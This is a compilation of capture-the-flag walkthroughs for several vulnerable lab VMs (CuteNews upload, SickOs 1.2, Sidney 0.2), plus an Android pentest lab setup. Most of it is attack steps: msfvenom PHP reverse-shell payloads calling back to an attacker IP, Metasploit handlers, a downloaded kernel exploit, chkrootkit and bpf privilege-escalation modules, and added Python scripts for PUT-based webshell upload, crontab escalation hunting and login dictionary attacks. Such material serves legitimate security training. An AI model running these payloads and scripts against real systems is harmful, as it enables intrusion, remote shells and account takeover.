First Download Simple VM from here
Breaching Methodology:
- Network Scanning (Netdiscover, Nmap)
- Enumerate File upload vulnerability (searchsploit)
- Generate PHP Backdoor (Msfvenom)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Import python one-liner for proper TTY shell
- Kernel Privilege Escalation
- Get Root access and capture the flag.
[size=small]netdiscover[/size]
Our target is 192.168.1.106
Then scan the target with nmap:
[size=small]nmap -A 192.168.1.106[/size]
The scan shows port 80 open, with the web service pointing toward CuteNews, so we open it in the browser.
The page shows that our target is running CuteNews v.2.0.3. Search for a public exploit for that version:
[size=small]searchsploit cutenews 2.0.3[/size]
The exploit found by searchsploit contains the instructions to upload the file. The first thing it tells us is to register on the website, since only registered users are allowed to upload a file.
To register, it asks for a username and password, as shown below.
When you complete the registration steps it redirects you to the following window:
Now we need a PHP backdoor to upload; generate it with msfvenom using the following command:
[size=small]msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw[/size]
In parallel, run multi/handler inside the Metasploit framework (shown below).
Copy the code from <?php to die() and save it in a file with a .php extension. To upload it, log in with the account you just registered, open Personal options, fill in your username and e-mail address, browse to the .php file and click Save.
Now use dirb to brute-force directories on the web server:
[size=small]dirb http://192.168.1.106[/size]
It shows an /uploads directory, which is where the uploaded file lands. Open the directory in the browser, find your uploaded file there and open it to execute the backdoor.
Meanwhile, return to the Metasploit terminal, where multi/handler is waiting for the meterpreter session:
[size=small]msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit[/size]
In the image below you can see Meterpreter session 1 open. The task is not finished yet; we still need to escalate privileges. First drop into a system shell:
[size=small]shell[/size]
Then, to get a proper TTY shell, spawn a pty with a Python one-liner:
[size=small]python -c 'import pty;pty.spawn("/bin/bash")'[/size]
[size=small]cd /tmp[/size]
Using the sysinfo command I found the kernel version and machine architecture, which is what you need to choose a kernel exploit; a Google search for that kernel turned up Exploit-DB entry 36746.
Since that kernel version is reported vulnerable, download the exploit onto the target with the command below (check the version range in the exploit's header against the running kernel before executing anything, as a mismatched kernel exploit can crash the box):
[size=small]wget https://www.exploit-db.com/download/36746.c[/size]
This downloads the exploit source. Next, compile it statically so the binary does not depend on the target's shared libraries:
[size=small]gcc 36746.c -o access -static[/size]
Now run the compiled binary:
[size=small]./access[/size]
Then type id to confirm you now have uid=0 (root), and change into root's home directory:
[size=small]cd /root[/size]
Then list its contents:
[size=small]ls[/size]
One of the files listed is flag.txt. Read the flag with:
[size=small]cat flag.txt[/size]
In this walkthrough, I will explain how to solve the SickOs 1.2 challenge. This OS is the second in the SickOs series and is independent of the prior release; the scope of the challenge is to gain the highest privileges on the system. This CTF demonstrates how attack strategies can be run against a machine on a network to compromise it, in a safe environment.
First Download Sick OS from Here
Breaching Methodology:
- Network Scanning (Netdiscover, Nmap)
- Directory brute-force (dirb)
- Find HTTP Options: PUT (curl)
- Generate PHP Backdoor (Msfvenom)
- Install Poster (Firefox plug-in)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Privilege Escalation (cron job)
- Import python one-liner for proper TTY shell
- Get Root access and capture the flag.
So first, find the target on the network with netdiscover:
[size=small]netdiscover[/size]
Our target is 192.168.1.109. Next we run an nmap scan against it:
[size=small]nmap -A 192.168.1.109[/size]
As you can see, port 80 is open, which means we can open this IP in the browser.
Opening the IP in the browser shows the image above, which tells us nothing, and the page source holds nothing useful either. So we use dirb to brute-force directories:
[size=small]dirb http://192.168.1.109[/size]
As a result, dirb found a directory, test. Open it in the browser as well:
[size=small]192.168.1.109/test/[/size]
It shows a directory listing. Let us probe the test directory with curl to see which HTTP methods it accepts:
[size=small]curl -v -X OPTIONS http://192.168.1.109/test[/size]
The verbose output shows that PUT is allowed, which means you can write your own file into that directory.
So, prepare the malicious file that you would upload with msfvenom:
[size=small]msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=443 -f raw[/size]
In parallel, run multi/handler inside the Metasploit framework (shown below).
Copy the code from <?php to die(); and paste it into a text file with a .php extension, for example shell.php; that is the file to upload.
To upload the .php file with the Poster add-on: click Tools in the menu bar, then Poster in the drop-down menu. In the dialog that opens, enter the target URL, browse to the file you want to upload and click PUT.
It reports that the file was uploaded.
You can confirm it in the browser, where the uploaded file (shell.php in our case) is now listed. Now open the file you just uploaded to run it.
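The OPTIONS-then-PUT-then-browse sequence above can be done without curl and the Poster add-on. The script below is an added example (not part of the walkthrough and not a SickOs component): it reads the Allow header, PUTs a file when PUT is advertised, and fetches it back. The in-process target server at the bottom is constructed purely so the demo runs offline; its /test/ path behaves like the writable directory found above.

```python
"""Enumerate HTTP methods with OPTIONS and, when PUT is allowed, upload a file
and fetch it back to see what the server does with it.  Standard library only.
Added example, not from the walkthrough; the target server below is a
constructed stand-in for the demo, not SickOs.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def _request(host, port, method, path, body=None, headers=None):
    """One request; returns (status, headers message, body bytes)."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, path, body=body, headers=headers or {})
        resp = conn.getresponse()
        return resp.status, resp.headers, resp.read()
    finally:
        conn.close()


def allowed_methods(host, port, path):
    """Methods the server advertises for path in its Allow header (upper-cased)."""
    _, headers, _ = _request(host, port, "OPTIONS", path)
    allow = headers.get("Allow", "")          # HTTPMessage.get is case-insensitive
    return {m.strip().upper() for m in allow.split(",") if m.strip()}


def put_file(host, port, path, data):
    """PUT raw bytes to path; 201 or 204 means the server stored it."""
    status, _, _ = _request(host, port, "PUT", path, body=data,
                            headers={"Content-Type": "application/octet-stream",
                                     "Content-Length": str(len(data))})
    return status


def upload_if_put_allowed(host, port, directory, filename, data):
    """Same workflow as the manual steps: OPTIONS, PUT, then GET the new file.
    Returns (put_advertised, put_status, get_status, get_body)."""
    if "PUT" not in allowed_methods(host, port, directory):
        return False, None, None, None
    target = directory.rstrip("/") + "/" + filename
    status = put_file(host, port, target, data)
    got, _, body = _request(host, port, "GET", target)
    return True, status, got, body


# --- constructed target: /test/ accepts PUT, the document root does not ---
class _DemoHandler(BaseHTTPRequestHandler):
    store = {}                        # path -> bytes written by PUT

    def log_message(self, *args):     # keep the demo quiet
        pass

    def _reply(self, status, body=b"", extra=None):
        self.send_response(status)
        for k, v in (extra or {}).items():
            self.send_header(k, v)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        methods = "GET,HEAD,POST,OPTIONS"
        if self.path.startswith("/test"):
            methods += ",PUT,DELETE"
        self._reply(200, extra={"Allow": methods})

    def do_PUT(self):
        if not self.path.startswith("/test/"):
            return self._reply(405)
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)


def start_demo_server():
    """Bind a throw-away server on a random loopback port and serve it in a
    daemon thread; use server.server_address and server.shutdown()."""
    srv = HTTPServer(("127.0.0.1", 0), _DemoHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    srv = start_demo_server()
    host, port = srv.server_address
    print(upload_if_put_allowed(host, port, "/test/", "shell.php", b"<?php echo 'ok'; ?>"))
    srv.shutdown()
```

Two things worth checking on a real target that the demo makes visible: the Allow header is only what the server advertises, so a PUT that is not listed may still work (and a listed one may be rejected for certain extensions), which is why the function PUTs and then GETs rather than trusting OPTIONS. And the GET body tells you whether the file is executed or merely stored: the demo server hands the PHP source back verbatim, whereas a target that runs PHP returns the script's output, which is the behaviour you want before pointing a handler at it.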
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
[size=small]msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 443
msf exploit(multi/handler) exploit[/size]
In the image below you can see Meterpreter session 1 open. The task is not finished yet; we still need to escalate privileges.
I then checked for cron jobs in /etc/crontab and found some scheduled jobs.
Moving on, list the crontab to look for something exploitable:
[size=small]cat /etc/crontab[/size]
This prints the scheduled jobs. Among them you can see that chkrootkit runs from cron as root. Some versions of chkrootkit are exploitable, so check which version is installed:
[size=small]chkrootkit -V[/size]
It shows version 0.49.
A quick search shows that Metasploit has a local exploit module for this. Load exploit/unix/local/chkrootkit, set session to 1 and lport to an arbitrary free port such as 8080, and run the module, as shown in the image.
This gives another session; as you can see we have spawned a command shell, and id shows uid=0, i.e. root.
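The crontab check above is a general privilege-escalation pattern, not just a chkrootkit trick: any root cron job whose command (or a file it trusts) can be modified by a low-privileged user is a root shell in waiting. The script below is an added example, not from the walkthrough, that parses system-crontab lines, keeps the root jobs and flags paths the current user could tamper with. The sample crontab is constructed; the chkrootkit line mirrors the one found on SickOs, and the version check encodes the known fact that chkrootkit before 0.50 (CVE-2014-0476) executes /tmp/update when run, which is what the Metasploit module relies on.

```python
"""Hunt for privilege escalation in the system crontab: parse /etc/crontab
lines, keep the jobs that run as root, and flag commands whose executable (or,
if the file is missing, its parent directory) is writable by the current user.
Added example, not from the walkthrough; SAMPLE_CRONTAB is constructed.
"""
import os
import shlex

SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * *       root    /usr/sbin/chkrootkit
*/5 * * * *     www-data /var/www/cleanup.sh
@reboot         root    /opt/backup/backup.sh
"""


def parse_system_crontab(text):
    """Return (user, command) for each job line.  The system crontab has a
    user field after the five time fields; @reboot-style lines have one
    shortcut field instead of five.  Comments and VAR=value lines are skipped."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "=" in line.split(None, 1)[0]:     # SHELL=, PATH=, MAILTO= ...
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)       # @reboot user command
            if len(parts) == 3:
                jobs.append((parts[1], parts[2]))
        else:
            parts = line.split(None, 6)       # m h dom mon dow user command
            if len(parts) == 7:
                jobs.append((parts[5], parts[6]))
    return jobs


def writable_targets(command, exists=os.path.exists, access=os.access):
    """Absolute paths named in command that the current user could tamper
    with: an existing file we can write, or a missing file whose parent
    directory we can write (so we could plant it).  exists/access are
    injectable so the logic can be exercised against a fake filesystem."""
    try:
        tokens = shlex.split(command)
    except ValueError:                        # unbalanced quotes; fall back
        tokens = command.split()
    hits = []
    for tok in tokens:
        if not tok.startswith("/") or tok == "/":
            continue
        if exists(tok):
            if access(tok, os.W_OK):
                hits.append(tok)
        elif access(os.path.dirname(tok), os.W_OK):
            hits.append(tok + " (missing, parent writable)")
    return hits


def root_jobs_with_writable_targets(text, exists=os.path.exists, access=os.access):
    """[(command, [writable paths])] for root jobs with at least one hit."""
    out = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        hits = writable_targets(command, exists, access)
        if hits:
            out.append((command, hits))
    return out


def chkrootkit_runs_tmp_update(version):
    """chkrootkit before 0.50 (CVE-2014-0476) executes /tmp/update as the
    user running it, so a root cron job like the one above is a root shell
    for anyone who can write /tmp; exploit/unix/local/chkrootkit plants
    that file.  Returns True when the version string is in the affected range."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts < (0, 50)


if __name__ == "__main__":
    for command, hits in root_jobs_with_writable_targets(SAMPLE_CRONTAB):
        print("root job:", command, "->", hits)
    print("chkrootkit 0.49 affected:", chkrootkit_runs_tmp_update("0.49"))
```

Run against the real /etc/crontab with the default os.path.exists/os.access, the writable check reflects the account you hold on the box, so run it from the www-data shell, not from your own machine. The chkrootkit case is the one this script cannot see from file permissions alone: /usr/sbin/chkrootkit itself is not writable, the weakness is in what it executes, which is why checking the version of each root-run tool is the second step after the permission sweep.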
[size=small]id
cd /root[/size]
And to see the list of files in /root type :
[size=small]ls -lsa[/size]
In the list you will see a text file; read it with:
[size=small]cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt[/size]
So first we have to setup an environment for android application testing.
Requirements for android penetration testing:
- Virtual Box
- Santoku OS which come with preinstalled SDKs.
- GenyMotion for creating Android Virtual Device ( AVD)
So first download Santoku OS from here. Santoku OS is built specifically for mobile penetration testing and forensic investigation. It comes with pre-installed SDKs and other utilities, and there is a bunch of forensic tools as well, such as firmware-flashing tools for multiple vendors and forensic scripts for enumerating app details.
After downloading Santoku open Virtual Box and create a new virtual machine for it.
Now select the RAM for the Santoku VM; the recommended value is 786MB but I took 2GB. Select according to your own need and click Next.
Here select the size of the hard disk as you wish and then create the VM.
Now, to install Santoku into the VM we created, right-click the Santoku VM and go to Settings > Storage. Select the empty optical drive, click the disk icon in front of it in the Attributes section, browse to the downloaded Santoku ISO file and click OK.
Now the installation process begins: select your preferred language, click Continue and then click Install Now.
Santoku now copies files and installs. Sit back and wait a few minutes, after which it restarts.
Now you can download Genymotion from here .
Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android with OpenGL hardware acceleration suitable for application testing.
After installing Genymotion, go to https://www.genymotion.com/account/create/ and create a free account there and verify your email ID. Then come back to genymotion desktop software and login there using newly created account credentials.
Select a device according to your need and click Next. In this section you review the configuration of the Android mobile device and finally create the virtual device.
Here you can see I created 2 virtual devices. Now select the devices and launch it.
Here is our Android Virtual Device.
To test our application for vulnerabilities we need the Android SDK, because in the testing phase we will use the ADB (Android Debug Bridge) command line almost all the time. The Android SDK is pre-installed in Santoku OS, so now we connect Santoku to our Android Virtual Device.
First, check the IP of the Android Virtual Device, then connect to it:
adb connect <IP of Android Virtual Device>
You can check whether device is connected or not by typing:
adb devices
Here we can see the list shows 1 device connected.
And you can also open a shell on the Android device by typing:
adb shell
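Before scripting anything against the emulator it pays to check not just that adb lists the device but what state it is in: a device shown as `unauthorized` (USB-debugging prompt not yet accepted on the device) or `offline` appears in the list but will refuse `adb shell`. The snippet below is an added example, not part of the original article; the `adb devices` output it parses is constructed, and `live_adb_devices` assumes `adb` is on your PATH.

```python
"""Parse `adb devices` output and report which attached targets can actually
be driven.  Added example; SAMPLE_ADB_DEVICES is constructed text.
"""
import subprocess

SAMPLE_ADB_DEVICES = """\
List of devices attached
192.168.56.101:5555\tdevice
192.168.56.102:5555\tunauthorized
emulator-5554\toffline
"""


def parse_adb_devices(output):
    """Return [(serial, state)] from `adb devices` text.  The first line is the
    header; lines starting with '*' are daemon start-up notices; the state may
    be more than one word (e.g. 'no permissions ...'), so keep the whole tail."""
    devices = []
    for line in output.splitlines()[1:]:
        line = line.strip()
        if not line or line.startswith("*"):
            continue
        parts = line.split()
        if len(parts) >= 2:
            devices.append((parts[0], " ".join(parts[1:])))
    return devices


def usable_devices(output):
    """Serials in state 'device'; only these accept `adb shell`."""
    return [serial for serial, state in parse_adb_devices(output) if state == "device"]


def blocked_devices(output):
    """Serials that are attached but not ready, with the reason adb reports."""
    return [(s, st) for s, st in parse_adb_devices(output) if st != "device"]


def live_adb_devices():
    """Run the real command (assumes adb on PATH) and parse it."""
    result = subprocess.run(["adb", "devices"], capture_output=True, text=True, check=True)
    return parse_adb_devices(result.stdout)


if __name__ == "__main__":
    print("usable:", usable_devices(SAMPLE_ADB_DEVICES))
    print("blocked:", blocked_devices(SAMPLE_ADB_DEVICES))
```

For a Genymotion device that shows as `unauthorized`, accept the "Allow USB debugging" dialog on the device screen and re-run `adb devices`; an `offline` entry after `adb connect` usually clears up with `adb disconnect <ip>` followed by a fresh `adb connect`.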
So the penetration-testing lab for Android applications is complete; stay tuned for the next article on actual Android app penetration testing and hacking.
Today we will take up a boot2root challenge by Nightmares: Sidney: 0.2. https://www.vulnhub.com/entry/sidney-02,149/
Breaching Methodologies:
- Network Scanning (Nmap, netdiscover)
- webserver enumeration (view source)
- Directory brute-force (dirb)
- Generate own Dictionary (crunch)
- Login into the admin console
- Generate PHP Backdoor (Msfvenom)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Kernel privilege escalation (Metasploit)
- Gain root access
- Penetrate for flag.zip
- Access Ram and finished the task
[size=small]netdiscover[/size]
Now that we have located our target IP i.e. 192.168.1.103, our next step is to scan it.
[size=small]nmap -A -p- 192.168.1.103[/size]
The scan shows that port 80 is open, which means this IP will open in the browser, so let us try that.
Then we looked into the page source.
It pointed to another path; we opened it in the browser (192.168.1.103/commorode64) and, to our luck, found another page.
Reading that page's source you learn that the username is robhubbard, and further down you find some hints about the password:
- the password is in lowercase
- the password has 3 letters and four digits
- and it is related to c=64 sound chip
Then we ran dirb to brute-force web directories; it returned many, but index.php looked interesting, so we explored it.
It asks for a username and password. We already know the username, so we only have to find the password.
Working from the hints, we first looked up the C=64 sound chip on Wikipedia and found:
MOS gives the first three letters of the password.
That leaves the last four digits, which we enumerate with crunch (the pattern fixes mos and fills the four % positions with digits):
[size=small]crunch 7 7 -t mos%%%% -o /root/Desktop/dict.txt[/size]
Crunch generates the dictionary file.
Then run a dictionary attack with that list in Burp Suite; it reveals the password, as shown below:
Now enter the username and password on the index.php page.
Once logged in, the following page opens, and on it you have to upload a malicious PHP file.
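The crunch-plus-Burp step above is a dictionary attack with a very small keyspace (10,000 candidates), which is also easy to run from a script. The code below is an added example, not from the walkthrough: it generates the same `mos%%%%` list, drives a generic dictionary attack against any login oracle, and provides an HTTP form-login oracle built on urllib. The form field names (`username`/`password`) and the failure marker are assumptions to be confirmed in Burp against the real form, and the demo oracle with its secret `mos4711` is constructed for the example, not Sidney's actual password.

```python
"""Turn the password hints into a candidate list and run a dictionary attack
against a login oracle.  Added example; field names, failure marker and the
demo secret are assumptions / constructed values, not from the walkthrough.
"""
import itertools
import string
import urllib.error
import urllib.parse
import urllib.request


def hint_wordlist(prefix="mos", digits=4):
    """Equivalent of `crunch 7 7 -t mos%%%%`: prefix followed by every
    combination of `digits` decimal digits, in order (10**digits candidates)."""
    for combo in itertools.product(string.digits, repeat=digits):
        yield prefix + "".join(combo)


def dictionary_attack(username, candidates, try_login):
    """Call try_login(username, password) for each candidate until one returns
    True.  Returns (password, attempts), or (None, attempts) if none worked."""
    attempts = 0
    for password in candidates:
        attempts += 1
        if try_login(username, password):
            return password, attempts
    return None, attempts


def http_form_login(url, user_field="username", pass_field="password",
                    failure_marker=b"Invalid"):
    """Build a try_login callable that POSTs the form and treats a 2xx/3xx
    response without failure_marker in the body as success (the same idea as
    a Burp Intruder grep match).  Field names and marker are assumptions."""
    def try_login(username, password):
        data = urllib.parse.urlencode({user_field: username,
                                       pass_field: password}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                body = resp.read()
        except urllib.error.HTTPError:      # 401/403 etc. count as failures
            return False
        return failure_marker not in body
    return try_login


# Constructed oracle standing in for the login page; the secret is a made-up
# value inside the keyspace the hints allow, not the real password.
_DEMO_SECRET = "mos4711"


def demo_oracle(username, password):
    return username == "robhubbard" and password == _DEMO_SECRET


if __name__ == "__main__":
    found, attempts = dictionary_attack("robhubbard", hint_wordlist(), demo_oracle)
    print(found, "after", attempts, "attempts")
```

Before running `dictionary_attack` with `http_form_login` against a real target, confirm in Burp what a failed login actually returns (a marker string, a redirect, a status code) and whether the application throttles or locks accounts; 10,000 POSTs is noticeable, and a lockout turns the attack into a denial of service on the very account you need.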
Now to generate the PHP backdoor, open a terminal in your Kali and type:
[size=small]msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw[/size]
Simultaneously start multi handler inside Metasploit framework.
Copy the code from <?php to die() and save it in a file with a .php extension. Now upload this file by browsing to it on the web page.
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session by exploiting multi handler.
[size=small]msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit[/size]
In the image below you can see Meterpreter session 1 open. The task is not finished yet; we still need to escalate privileges.
Running sysinfo shows kernel 4.4, and with that we found a Metasploit module for kernel privilege escalation. Type the following:
[size=small]use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set session 1
msf exploit(linux/local/bpf_priv_esc) > set lhost 192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport 8888
msf exploit(linux/local/bpf_priv_esc) > exploit[/size]
[size=small]cd /root
ls[/size]
[size=small]download hint.gif /root/Desktop/[/size]
When we opened hint.gif it showed the image below, and I was unable to extract a hint from the conversation in it.
Further, I executed the following commands:
[size=small]cd .commodor64
ls
cd .miami
ls
cd vice
ls[/size]
[size=small]download flag.zip /root/Desktop/[/size]
We will run a dictionary attack on the archive with rockyou.txt; the command is:
[size=small]fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt flag.zip[/size]
And yes, at last you have the password. Now unzip flag.zip by typing:
[size=small]unzip flag.zip[/size]
It asks for the password; enter the one you just recovered.
And YAY!!!!! We have captured the flag! Enjoy it.